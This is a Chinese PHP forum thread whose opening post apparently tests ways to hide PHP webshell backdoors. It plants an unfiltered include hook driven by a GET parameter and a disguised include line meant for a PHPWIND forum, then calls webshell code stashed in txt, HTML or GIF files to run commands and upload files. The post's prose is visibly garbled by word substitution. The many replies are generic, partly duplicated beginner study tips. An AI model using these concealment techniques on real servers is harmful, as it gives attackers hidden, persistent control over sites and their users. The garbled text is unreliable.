仓酷云

标题: PHP网页编程之平安基本：PHP后门的埋没技能测试呈报 [打印本页]

作者: 深爱那片海 时间: 2015-2-4 00:00
标题: PHP网页编程之平安基本：PHP后门的埋没技能测试呈报
在学习中，我也一直这样要求着自己。　　比来良多伴侣都在问我是不是能把我那一句话木马埋没到HTML或图片里，其实把一句话木马拔出到PHP文件中就已很荫蔽了，假如说硬是要放到HTML文件或图片里，就接着往下看这篇的篇测试呈报吧。要晓得假如光把PHP语句放到图片里是不管若何也不克不及履行的，由于PHP只解析扩大名为php的文件。所以说要能使埋没在图片里的PHP语句履行。咱们就的借助PHP中的挪用函数：include 、require 等。
　　咱们还记得前些日子把木马埋没到图片的文章吧。也就是在PHP文件里用include("x.gif")如许的语句来挪用埋没在图片的木马语句。ASP中语句也相似。看似十分荫蔽但直接挪用图片对略微懂点PHP的人就不难发明可疑的地方。因为URL 里用GET体例很难传递参数，这就使得拔出木马的功能得不到发扬。
　　Include 函数在PHP中利用的对照频仍，所以引发的平安成绩也其实太多，例如PHPWIND1.36的破绽就是由于include前面的变量没做过滤引发的。由此咱们就能够机关相似的语句来拔出到PHP文件中。然后把木马埋没到图片或HTML文件里，可以说荫蔽性就更高了。如在PHPWIND服装论坛里拔出上面的语句：＜‘’?@include includ/.$PHPWIND_ROOT;? ＞普通办理员是没法看出来的。
　　有了include 函数来帮助协助咱们就能够把PHP木马埋没到诸如 txt、html和图片文件等良多类型的文件里来了。由于txt、html和图片文件这三品种型的文件最不管在服装论坛仍是文章体系里是最为罕见的了，上面咱们就顺次来做测试。
　　起首创立一PHP文件test.php 文件内容为:
　　$test=$_GET['test'];
　　@include 'test/'.$test;
　　?＞
　　Txt文件普通都是申明文件，所以咱们把一句话木马放到目次的申明文件里就OK了。随意创立一个TXT文件t.txt。咱们把一句话木马粘贴到t.txt文件里。然后会见 http://localhost/test/test.php?test=../t.txt 假如你看到t.txt的内容就证实Ok了，然后把在lanker微型PHP后食客户端木马地址添入 http://localhost/test/test.php?test=../t.txt 暗码里添入cmd就能够了，履行前往的了局都可以看到。
　　关于HTML的文件，普通都为模版文件。为了使拔出到HTML的文件的木马能被挪用履行并且不被显示出来，咱们可以在HTML里到场一个埋没属性的文本框，如：然后利用办法同上。履行的前往了局普通都可以检查源文件看到。如利用检查本法式目次功效。检查源文件内容为我可以失掉目次为 C:\Uniserver2_7s\www\test。
　　上面咱们说说图片文件，要说最为毒的一招莫过于把木马埋没到图片里。咱们可以直接对一个图片停止编纂，把拔出到图片末尾
　　经测试普通都不会对图片形成影响。然后一样办法客户端木马地址添入
　　咱们检查PHP情况变量前往的是了局是原图片。
　　这里能够要和咱们想象的了局有些差距了，其实号令已运转了，只是前往的了局看不到罢了，由于这是真实的GIF文件，所所以不会显示前往了局的，为了证实是不是真的履行了号令咱们履行上传文件号令。果不出所料，文件已胜利上传到办事器上。如许捏造的长处是荫蔽性好。弱点也天然不必说了是没回显。假如你想看到前往的了局，那就拿出记事本捏造一个假的图片文件吧。
　　到这里就根基测试完了，如何荫蔽PHP后门就看你本人的选择了。行文仓皇，若有不当的地方，请指出!
怎么配置呢，问最好的老实百度，问啥都有答案。所以用好搜索引擎是学好的令1个关键，程序会出各样的问题，没有1个人可能会碰到所有的问题，所有就可以问百度这个大家精华的集合了。

作者: 精灵巫婆 时间: 2015-2-4 08:00
本文当是我的笔记啦，遇到的问题随时填充

作者: 海妖 时间: 2015-2-9 19:34
基础有没有对学习php没有太大区别，关键是兴趣。

作者: 小女巫 时间: 2015-2-9 22:38
首先声明：我是一个菜鸟，是一个初学者。学习了一段php后总是感觉自己没有提高，无奈。经过反思我认为我学习过程中存在很多问题，我改变了学习方法后自我感觉有了明显的进步。

作者: 再见西城 时间: 2015-2-26 00:41
学好程序语言，多些才是王道，写两个小时代码的作用绝对超过看一天书，这个我是深有体会（顺便还能练打字速度）。

作者: 简单生活 时间: 2015-3-1 20:45
在我安装pear包的时候老是提示，缺少某某文件，才发现那群extension 的排列是应该有一点的顺序，而我安装的版本的排序不是正常的排序。没办法我只好把那群冒号加了上去，只留下我需要使用的扩展。

作者: 飘灵儿 时间: 2015-3-5 21:15
建议加几个专业的phper的群，当然啦需要说话的人多，一处一点问题能有人回答你的，当然啦要让人回答你的问题，平时就得躲在里面聊天，大家混熟啦，愿意回答你问题的人自然就多啦。

作者: 乐观 时间: 2015-3-8 15:12
有位前辈曾经跟我说过，phper 至少要掌握200个函数编起程序来才能顺畅点，那些不熟悉的函数记不住也要一拿手册就能找到。所以建议新手们没事就看看php的手册（至少array函数和string函数是要记牢的）。

作者: 若天明 时间: 2015-3-16 02:42
这些中手常用的知识，当你把我说的这些关键字都可以熟练运用的时候，你可以选择自己

作者: 灵魂腐蚀 时间: 2015-3-22 19:04
真正的方向了，如果将来要去开发团队，你一定要学好smarty ,phplib这样的模板引擎，

作者: 因胸联盟 时间: 2015-3-28 21:00
环境搭建好,当你看见你的浏览器输出“it works\\\\\\\"时你一定是喜悦的。在你解决问题的时候，我强烈建议多读php手册。

作者: 飘飘悠悠 时间: 2015-4-1 20:08
我学习了一段时间后，我发现效果并不好（估计是我自身的问题）。因为一个人的精力总是有限的，同时学习这么多，会导致每个的学习时间都得不到保证。

作者: 蒙在股里 时间: 2015-4-6 09:04
学好程序语言，多些才是王道，写两个小时代码的作用绝对超过看一天书，这个我是深有体会（顺便还能练打字速度）。

作者: 柔情似水 时间: 2015-5-1 19:12
,熟悉html,能用div+css，还有javascript，优先考虑linux。我在开始学习的时候，就想把这些知识一起学习，我天真的认为同时学习能够互相呼应，因为知识是相通的。

作者: 愤怒的大鸟 时间: 2015-5-4 09:56
不禁又想起那些说php是草根语言的人，为什么认得差距这么大呢。

作者: 再现理想 时间: 2015-6-4 01:49
Apache不是非得用80或者8080端口的，我刚开始安得时候就是80端口老占用，就用了个 81端口，结果照常，就是输localhost的时候，应该输入为 localhost:81

作者: admin 时间: 2015-6-11 21:05
个人呢觉得，配wamp 最容易漏的一步就是忘了把$PHP$目录下的libmysql.dll拷贝到windows系统目录的system32目录下，还有重启apache。

作者: 透明 时间: 2015-6-14 20:14
首先声明：我是一个菜鸟，是一个初学者。学习了一段php后总是感觉自己没有提高，无奈。经过反思我认为我学习过程中存在很多问题，我改变了学习方法后自我感觉有了明显的进步。

作者: 谁可相欹 时间: 2015-6-27 02:30
刚开始安装php的时候，我图了个省事，把php的扩展全都打开啦（就是把php.ini 那一片 extension 前面的冒号全去掉啦），这样自然有好处，以后不用再需要什么功能再来打开。

作者: 爱飞 时间: 2015-7-9 08:56
至于模板嘛，各位高人一直以来就是争论不休，我一只小菜鸟就不加入战团啦，咱们新手还是多学点东西的好。

欢迎光临仓酷云 (http://ckuyun.com/)